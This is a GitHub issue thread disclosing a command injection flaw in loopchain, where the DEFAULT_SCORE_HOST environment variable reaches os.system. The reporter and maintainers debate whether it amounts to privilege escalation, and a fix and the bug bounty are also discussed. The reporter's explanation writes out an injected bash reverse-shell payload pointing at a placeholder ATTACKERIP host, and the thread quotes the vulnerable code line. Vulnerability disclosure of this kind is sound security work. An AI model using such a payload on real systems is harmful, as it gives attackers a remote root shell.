Command Injection (Privilege Escalation) #231
Comments
|
You mean an attacker having access to environment variables is also able to inject commands in its own loopchain node ? |
|
Hi thanks for your reply. I totally agree with you, but I did not mean remotely. What I meant was an attacker can escalate privileges from a low privilege shell by changing the environment (Injection in environment variable) . |
- remove legacy score configurations, useless code - fix command injection issue (#231)
|
I created PR that would be fixed this issue. |
|
Thank you. Am I still eligible for a bounty please? |
|
You may need to apply in the ICONLOOP Bug Bounty program if you want to raise awareness about the vulnerability you found, and let the people responsible of the bug bounty program to evaluate the vulnerability reward : https://hackerone.com/iconloop_inc |
|
I don't think this is critical, because the attacker first needs to gain access to the host where the loopchain is running. Furthermore, loopchain itself doesn't need any special privileges to run, so there is nothing the attacker could get from the such attack. |
|
A hacker can escalate their privileges to root after gaining a low privilege shell. So it is a privilege escalation vulnerability, thanks anyways for listening. |
- remove legacy score configurations, useless code - fix command injection issue (#231)
- remove legacy score configurations, useless code - fix command injection issue (#231)
- remove legacy score configurations, useless code - fix command injection issue (#231)
|
A CVE was assigned but unfortunately hackerone/your company refuses to pay the bounty. However my objective as a Security Researcher as been fulfilled, thank you for patching this vulnerability. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12997 |
Could you provide us detailed steps to reproduce such exploit in a loopchain environment to acquire a root shell from your exploit please ? As sink772 mentionned, the loopchain engine doesn't require to run with any special privileges. So classifying this vulnerability as a privesc to root doesn't sound correct with the current vulnerability you've pointed out. Thanks for the vulnerability report and for the fix, let's classify it correctly and remain factual. |
|
So if you look at this line of code: os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts") This command will need root privileges to run as its trying to append/write something to /root/.ssh/known_hosts. (Anything that writes to root directory needs root privilege) Lets say an attacker gets a low privilege shell where Loopchain is installed. The attacker now wants to escalate privileges root so he/she will injected a bash reverse shell inside of DEFAULT_SCORE_HOST environment variable, then whenever that line of code runs, it will send a reverse shell with root privileges to the attacker. Simple but effective. The line of code would then look like this: os.system("ssh-keyscan "+ ;bash -i >& /dev/tcp/ATTACKERIP/PORT 0>&1;+" >> /root/.ssh/known_hosts") As you can see the semi-colons terminated the irrelevant queries so only the attackers code gets executed in bash. Now this command will have to be run as root as its writing to /root/ directory. Try and understand the concept please. |
|
I'm having no issue understanding the concept, but thanks for the explanation :)
No, that's not what happens in a normal scenario. Anyway, this is indeed a command injection from legacy code, and it deserved to be reported, so thanks for that. |
Description:
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
Details:
An attacker can manipulate DEFAULT_SCORE_HOST which is trusted user supplied input, this can be used to inject commands and gain arbitrary code execution.
Affected URL:
https://github.com/icon-project/loopchain/blob/2ab4734138d6a2a480a08ee023b2f4d74679ed43/loopchain/__main__.py
Affected Code:
if os.getenv('DEFAULT_SCORE_HOST') is not None: os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")Reference:
https://www.owasp.org/index.php/Command_Injection
Example/PoC:
The text was updated successfully, but these errors were encountered: